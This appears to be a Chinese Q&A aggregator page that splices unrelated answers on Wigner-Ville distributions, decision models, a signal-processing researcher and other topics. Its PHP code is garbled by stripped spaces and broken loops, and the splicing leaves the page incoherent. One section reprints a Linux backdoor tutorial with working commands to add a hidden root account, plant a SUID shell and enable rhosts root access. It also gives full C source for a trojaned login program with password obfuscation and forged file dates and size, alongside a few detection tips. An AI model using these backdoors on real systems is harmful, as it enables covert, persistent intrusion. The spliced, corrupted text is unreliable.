A. 如何直观理解Wigner分布函数
关于时频工具箱,我倒没用过。我做数据一般都是用FFT,然后设计滤波算法。关于你的问题,我查了一下,这边有一个步骤,供你参考下。详细步骤:1、x=sig;(也就是你要处理的信号)2、如果信号是实信号,则求其解析信号:y=hilbert(x);3、求其WVD,[tfr,t,f]=tfrwv(y);4、作图:contour(t,f,tfr),其中f为归一化频率,可以乘上信号的采样频率的一般还原,看其频率分布,另外tfr,最好写成abs(tfr),做出的图好看。
$key="Thisissupposedtobeasecretkey!!!";
functionkeyED($txt,$encrypt_key)
{
$encrypt_key=md5($encrypt_key);
$ctr=0;
$tmp="";
for($i=0;$i<strlen($txt);$i++){
if($ctr==strlen($encrypt_key))$ctr=0;
$tmp.=substr($txt,$i,1)^substr($encrypt_key,$ctr,1);
$ctr++;
}
return$tmp;
}
functionencrypt($txt,$key)
{
srand((double)microtime()*1000000);
$encrypt_key=md5(rand(0,32000));
$ctr=0;
$tmp="";
for($i=0;$i<strlen($txt);$i++){
if($ctr==strlen($encrypt_key))$ctr=0;
$tmp.=substr($encrypt_key,$ctr,1).
(substr($txt,$i,1)^substr($encrypt_key,$ctr,1));
$ctr++;
}
returnkeyED($tmp,$key);
}
functiondecrypt($txt,$key)
{
$txt=keyED($txt,$key);
$tmp="";
for($i=0;$i<strlen($txt);$i++){
$md5=substr($txt,$i,1);
$i++;
$tmp.=(substr($txt,$i,1)^$md5);
}
return$tmp;
}
$string="HelloWorld!!!";
//encrypt$string,andstoreitin$enc_text
$enc_text=encrypt($string,$key);
//decrypttheencryptedtext$enc_text,andstoreitin$dec_text
$dec_text=decrypt($enc_text,$key);
//加密
functionstr2hex($s)
{
$r="";
$hexes=array("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
for($i=0;$i<strlen($s);$i++)=""$r.=($hexes[(ord($s{$i})>>4)].$hexes[(ord($s{$i})&0xf)]);
return$r;
}
//解密
functionhex2str($s)
{
$r="";
for($i=0;$i<strlen($s);$i=""+="2)"{
$x1=ord($s{$i});
$x1=($x1>=48&&$x1<58)?$x1-48:$x1-97+10;
$x2=ord($s{$i+1});
$x2=($x2>=48&&$x2<58)?$x2-48:$x2-97+10;
$r.=chr((($x1<<4)&0xf0)|($x2&0x0f));
}
return$r;
}
echostr2hex("山东");
echo"
";
echohex2str("c9bdb6ab");
?>
C. 什么叫传统理性模型
传统理性模型俗称理性决策模型,简称理性模型(rational modal)起源于传统经济学的理论,传统经济学理论是以“经济人”的假设为前提的,舍弃了一些次要变量,使问题的分析得以简化,形成有效的分析框架,能用来解释经济中的诸多现象。
内容:
1、决策者面临的是一个既定的问题。
2、决策者选择决定的各种目的,价值或目标是明确的,而且可以依据不同目标的重要性进行排序。
3、决策者有可供选择的两个以上的方案,面对着这些方案,通常在逐一选择的基础上,选取其中一个。假如方案基本是相同的,通常会作相同的决定。
4、决策者对同一个问题会面临着一种或多种自然状态。它们是不以人们意志为转移的不可控因素。或者可以说决策者的偏好会随着时空的变化而变化。
5、决策者会将每一个方案,在不同的自然状态下的收益值(程度)或损失值(程度)计(估)算出来,经过比较后,按照决策者的价值偏好,选出其中最佳者。
理性决策在实际中必须具备以下基本条件:
1、决策过程中必须获得全部有效的信息。
2、寻找出与实现目标相关的所有决策方案。
3、能够准确地预测出每一个方案在不同的客观条件下所能产生的结果。
4、非常清楚那些直接或间接参与公共政策制定的人们的社会价值偏向及其所占的相对比重。
5、可以选择出最优化的决策方案。
分析方法:
1、建立一套完整的操作目标,并赋予权重。
2、准备一套完整的被选方案。
3、建立一套其他价值与资源的完整清单,并赋予权重。
4、对每一方案的成本/效益进行完整预测。
5、对每一方案进行净期望值计算。
6、 比较各净期望值,选取期望值最高的方案。
参考网络:http://ke..com/link?url=kBMGW9WVdhw-cn8w_82xY2ifxN5YCzzwbX-JwPqEKvpWCNXGCm2AGmf-gyovFJI9ArJU-o_54y9of7QcwinG9a
D. 李衍达的主要贡献
李衍达主要从事信号处理理论和地震勘探数据处理方法的研究。在信号重构理论方面,提出了应用幅度谱和部分采样点重构信号的新定理,使所需的采样点由N/2减至N/6;提出了利用相位重构技术估计时延的新方法;提出了仅用幅度谱重构最小相位信号的新算法。与合作者在用不完全投影重建图像问题上,提出了新的投影关系定理;在将信号处理、模式识别技术应用于地震勘探数据处理方面,提出了利用测井资料提高地震剖面分辨率的新方法,以及高分辨率速度谱估计方法;与合作者提出了采用POCS图像复原技术恢复波阻抗剖面的方法;提出了基于零、极点估计的子波估计与反褶积方法;提出了用新的τ-S变换剔除多次波的方法,以及综合地质、测井、地震资料预测储层分布等。
李衍达研究的仅用相位谱、幅度谱或附加部分时域采样点恢复有限长离散信号等问题,在信号重构理论及算法的研究上达到了国际先进水平。他将新的信号处理与模式识别方法用于地震勘探数据处理,取得了开拓性成果。
李衍达在信号处理理论方法及应用的研究领域也有成就,如利用部分数据重构信号、小波分析、分形信号处理以及这些方法在油气勘探与开发中的应用。此外,也从事智能信号处理的方法及系统的研究,如人工神经元网络、模糊系统、进化算法的理论模型及其在信息网络智能控制中的应用,研究了高速网络环境下数据的发掘、提取与多媒体数据的压缩和组织,以及工业生产过程及设备的智能控制。1997年以来,主要致力于生物信息学的研究,将复杂系统的信息处理和模式识别方法应用在分子生物学中;在基因组序列的信息结构研究,基因调控网络的建模和仿真等方面的研究中也取得了创新性成果。
李衍达曾主持自然科学基金重大项目。先后获国家自然科学奖、四次获国家教委科技进步奖(三次一等奖,一次二等奖)、北京市科技进步奖、国家优秀科技图书奖、电子部优秀教材奖及国家教委优秀教学成果特等奖。 中文
[1] 李衍达.信息世界漫谈. 清华大学出版社,2000
[2] 罗发龙,李衍达. 神经网络信号处理. 电子工业出版社,1993
[3] 李衍达, 常同. 信号重构理论及应用. 清华大学出版社,1991
[4] 李梢(博士后),王永炎,季梁,李衍达(导师). 复杂系统意义下的中医药学及其案例研究.系统仿真学报,2002, 14(11) :1429-03
[5] 邹红星(研究生),戴琼海,李衍达. FMlet变换的子空间. 中国科学,2001,31:5
[6] 邹红星(研究生),戴琼海,李衍达,卢旭光. 不含交叉项干扰且具有WVD聚集性的时频分布之不存在性. 中国科学,2001,31,4,348-354
[7] 刘宇新(研究生),李衍达(导师). 基于重叠正交变换的自适应图像水印. 电子学报,2001,10,1368-1372
[8] 李衍达. 信息与生命. 化学通报,2001,10,601-607
[9] 李衍达. 以信息系统的观点了解基因组. 电子学报,2001)29:1731-1734
[10] 邹红星,王殿军,戴琼海,李衍达. 延拓矩阵的奇异值分解. 科学通报,45卷,14期,1560-1562
[11] 李衍达. 与信息科学的结合为生命科学的研究开辟新的前景. 中国科学基金,第13卷,第5期,1999,9,pp,307-308
外文
[1] Xiaowo Wang, Jing Zhang, Fei Li, Jin Gu, Tao He, Xuegong Zhang, and Yanda Li. MicroRNA identification based on sequence and structure alignment. Bioinformatics,15 September 2005; Vol.21, No.18:3610-3614.
[2] Ying Huang and Yanda Li. Prediction of protein subcellular locations using fuzzy k-NN method. . Bioinformatics,Vol.20, No.1, 2004, pp.21-28, DOI:10.1093/bioinformatics/btg366
[3] Qing Zhou and Yanda Li. Directed variation in evolution strategies. IEEE Trans. on Evolutionary Computation, Vol.7, No.4, August 2003
[4] Ji HK, Zhou Q, Wen F, Xia HY, Lu X, Li YD. . AsMamDB: an alternative splice database of mammals . Nucleic Acid Research,2001, 29: 260-263
[5] H。Luo and Y.Li. The application of blind channel identification techniques to prestack seismic deconvolution。(Invited Paper). Proceedings of the IEEE,Vol.86,No.10,Oct.1998
[6] C-B Xiao,X-D Zhang and Y-D Li. A new method for AR order determination of an ARMA process. IEEE Trans.on SP,Vol.44,No.11,Nov.1996
[7] X-D Zhang,Y.Song and Y-D Li. Adaptive identification of nonminimum phase ARMA models using higher order cumulants alone. IEEE Trans.on SP,Vol.44,No.5,pp.1285-1288,May 1996
[8] Li Yanda. Information technological revolution and its impact on China. Computer Application on Petroleum Instry, Vol.2, 1994
[9] X-D Zhang and Y-D Li. Harmonic retrieval in mixed Gaussian and non-Gaussian ARMA noises. IEEE Trans.on Signal Processing,Vol.42, No.12, Dec.1994
[10] Luo Falong, Li Yanda. Real-time computation of the eigenvector corresponding to the smallest eigenvalue of a positive define matrix. IEEE Trans.on Circuit and Systems,Vol.41,No.6,1994
[11] Yen Ta Li,A.L.Kurkjian. Arrival time determination using iterative signal reconstruction from the phase of the cross spectrum.. IEEE Trans. on ASSP, Vol.ASSP-31,No.2. April, 1983
[12] Yanda Li. Improvement of maximum likelihood velocity spectrum estimation. ACTA GEOPHYSICA SINICA, Vol.26, No.2, March, 1983
李衍达共发表《信号重构理论及应用》、《神经网络信号处理》等多部着作及一百余篇论文。
E. 我要用Matlab做一个离散信号的Wigner分布,调用了tfrwv函数,但做出来的wigner分布不对,求一个示例程序。
关于时频工具箱,我倒没用过。我做数据一般都是用FFT,然后设计滤波算法。
关于你的问题,我查了一下,这边有一个步骤,供你参考下。
详细步骤:
1、x=sig;(也就是你要处理的信号)
2、如果信号是实信号,则求其解析信号:y=hilbert(x);
3、求其WVD,[tfr,t,f]=tfrwv(y);
4、作图:contour(t,f,tfr),其中f为归一化频率,可以乘上信号的采样频率的一般还原,看其频率分布,另外tfr ,最好写成abs(tfr),做出的图好看。
F. 光晕产品密钥是什么
产品密钥是产品授权的证明,它是根据一定的算法产生的随机数。当用户输入密钥产品会根据其输入的密钥判断是否满足相应的算法,通过这样来判断,以确认用户的身份和使用权限。
你联网看看能不能获得密钥,有些品牌电脑预装的OFFICE 2007是需要联网才能获取密钥的。不过这个密钥是有使用期限的,一般是90天。
G. WVD交叉项抑制是信号处理中的什么应用出现的问题
交叉项是因为wvd不满足变换的线性性质而产生的,从而造成伪峰值,所以在频谱检测时要抑制
H. 颁的读音是什么
颁 拼音: [bān] 部首:页部 笔画:10笔 五笔:WVDM 释义:1.发下:~发。~布。~赏。~示。~行。2.古同“班”、“斑”,头发花白。
I. 风险软件 RootShell
我可以很负责的告诉你,不安全.
它是一个木马
linux后门技术及实践
作者:出处:黑客基地责任编辑: 方舟 [ 2005-01-15 15:00 ]入侵者完全控制系统后,为方便下次进入而采用的一种技术
--------------------------------------------------------------------------------
后门简介
入侵者完全控制系统后,为方便下次进入而采用的一种技术。
一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。
常用后门技术
增加超级用户账号
破解/嗅探用户密码
放置SUID Shell
rhosts + +
利用系统服务程序
TCP/UDP/ICMP Shell
Crontab定时任务
共享库文件
工具包rootkit
可装载内核模块(LKM)
增加超级用户
# echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
如果系统不允许uid=0的用户远程登录,还需要增加一个普通用户账号。
破解/嗅探用户密码
获得shadow文件后,用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具,监听telnet、ftp等端口,收集用户密码。
放置SUID Shell
# cp /bin/bash /dev/.rootshell
# chmod u+s /dev/.rootshell
普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。
rhosts + +
# echo "+ +" > /.rhosts
# rsh -l root victim.com csh -i
远程可以得到一个rootshell。
利用系统服务程序
修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替换in.telnetd、in.rexecd等inted的服务程序
重定向login程序
TCP/UDP/ICMP Shell
BindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口监听,很容易被发现。Ping Backdoor,通过ICMP包激活后门,形成一个Shell通道。
TCP ACK数据包后门,能够穿越防火墙。
Crontab定时任务
通过Crontab程序调度已安装的后门程序定时运行,一般在深夜时段,是系统管理员不在线的时间。
共享库文件
在共享库中嵌入后门函数使用后门口令激活Shell,获得权限能够躲避系统管理员对二进制文件本身的校验
工具包rootkit
包含一系列系统及后门工具:
- 清除日志中的登录记录
- 伪装校验和
- 替换netstat、ps等网络工具
- 后门登录程序易于安装和使用
可装载内核模块(LKM)
LKM:Loadable Kernel Moles 动态的加载,不需要重新编译内核。
截获系统调用,具有隐藏目录、文件、进程、网络连接等强大功能。
自身隐蔽性好,发现难度较大。
着名的LKM包有adore和knark。
后门的检测
以自己的经验,结合特定的工具,手工作一些检测。
使用Tripwire或md5校验来检查系统。
借助IDS系统,监听到目标机器的可疑网络连接。
实例:login后门
入侵者先把原始的/bin/login备份,再用一段程序替换/bin/login。入侵者telnet登录进来的时候,通过环境变量或者终端类型
传递了正确的后门密码,将直接获得一个Shell;如果是普通用户登录,将会重定向到原始的login文件,来处理正常的登录。
最简单的login后门ulogin.c源代码如下:
实例:login后门
#include <stdio.h>
#define PASSWORD "passWORD"
#define _PATH_LOGIN "/sbin/logins"
main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/csh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}
利用后门登录
首先Telnet服务是打开的,在自己机器上:
bash$ export DISPLAY=passWORD
bash$ telnet victim.com
Trying xxx.xxx.xxx.xxx...
Connected to victim.com (xxx.xxx.xxx.xxx).
Escape character is '^]'.
% _
strings命令
strings命令能够打印出二进制文件中的可显示字符串,用于刚才的ulogin程序:
bash$ strings ulogin
/lib/ld-linux.so.2
..............
DISPLAY
/sbin/logins
passWORD
/bin/csh
加密后门密码
1,采用DES算法,即crypt( )函数,编写gen.c程序:
#include <unistd.h>
main(int argc, char *argv[])
{
if (argc != 3) {
printf("usage: %s <password> <salt>\n", argv[0]);
exit(1);
}
printf("%s\n", crypt(argv[1], argv[2]));
}
2、编译为gen,执行./gen hack ui,得到的shadow结果为UiVqMWvDrIQjA。
3、修改后门源程序ulogin.c:
-- 以密文形式的密码代替ulogin.c中define的宏PASSWORD值。
-- 如果后门密码正确,直接给出Shell:
if (!strcmp(PASSWORD, crypt(display,PASSWORD)))
{
system(SHELL);
exit(1);
}
用strings命令只能看到加密过的密码。
采用异或(XOR)算法
以十六进制方式表示字符串,以达到non- printable的效果
1、编码程序encode.c如下:
char magic[]="\x71\x67\x6d\x7a\x65\x61\x7a";
char *de(char *str,char *key)
{
int i=0,j=0,len;
len=strlen(key);
while(str[i] != '\0') {
str[i]^=key[j];
j++;
if(j==len) j=0;
i++;
}
return str;
}
void display(char *str)
{
int i;
for(i=0;i<strlen(str);i++) printf("\\x%x",str[i]);
printf("\n");
}
main()
{
char gets[100], *ptr;
ptr=gets;
scanf ("%s",ptr);
de(ptr,magic);display(ptr);
}
2、编译程序encode,依次执行得到关键字符串与magic串异或后的结果,例如原始login的文件名/sbin/xlogin,经过异或后为:
\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb
3、在后门源代码中这样定义:
Char
login[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";
然后插入异或函数char *de()结合同一magic串,就能判断出正确的后门密码。
用strings命令看不到密码、路径等字符串了。
最后的修饰
使后门程序ulogin的strings输出类似于正常login的strings输出,做法为:
在ulogin.c代码中增加一个字符串数组char strings[] ="";,在引号中填入正常login程序的strings输出结果。
以假乱真,增加迷惑性。
调整后门程序的文件日期、大小等属性:
1、日期
# ls -l /sbin/xlogin
-r-sr-xr-x root root 19300 Feb 11 1998
/sbin/xlogin
# touch -t 199802110000 ulogin
# _
2、调整大小
# ls -l ulogin /sbin/xlogin
-r-sr-xr-x root root 7542 Feb 11 1998 ulogin
-r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin
# bc
19300-7542
11758
# dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
1+0 records in
1+0 records out
11758 bytes transferred in 0.000379 secs (31016746
bytes/sec)
# cat /tmp/t >> ulogin
Login后门的检测
使用命令md5sum对现有/bin/login文件作校验,与以前的值作比较。
使用Red Hat Linux的RPM校验:
# rpm -V util-linux
在入侵者已经利用后门登录的情况下,who是看不到用户的,查看系统进程,查找login -h xxx.xxx.xxx.xxx的字样。
--------------------------------------------------------------------------------
J. 幅频特性曲线有什么作用
提出了一种测试光电经纬仪幅频特性曲线以及利用该特性曲线评价伺服控制系统跟踪性能的方法。论证了利用频率特性、传递函数、微分(或差分)方程描述同一个系统时所具有的等价关系,给出了利用光电经纬仪幅频特性曲线评价跟踪性能的意义和优势。描述了动态靶标连续调频运动模式下,光电经纬仪跟踪靶标目标时跟踪误差信号的WVD分布。通过分析跟踪误差的WVD分布可知跟踪误差信号为一系列谐波信号的叠加,因目前缺少准确分离该谐波信号的工具和算法,导致无法利用时频分析工具获取幅频特性曲线。因此提出采用间接方式利用线性调频信号测试光电经纬仪幅频特性曲线。最后给出了利用特性曲线评价光电经纬仪跟踪伺服系统性能的方法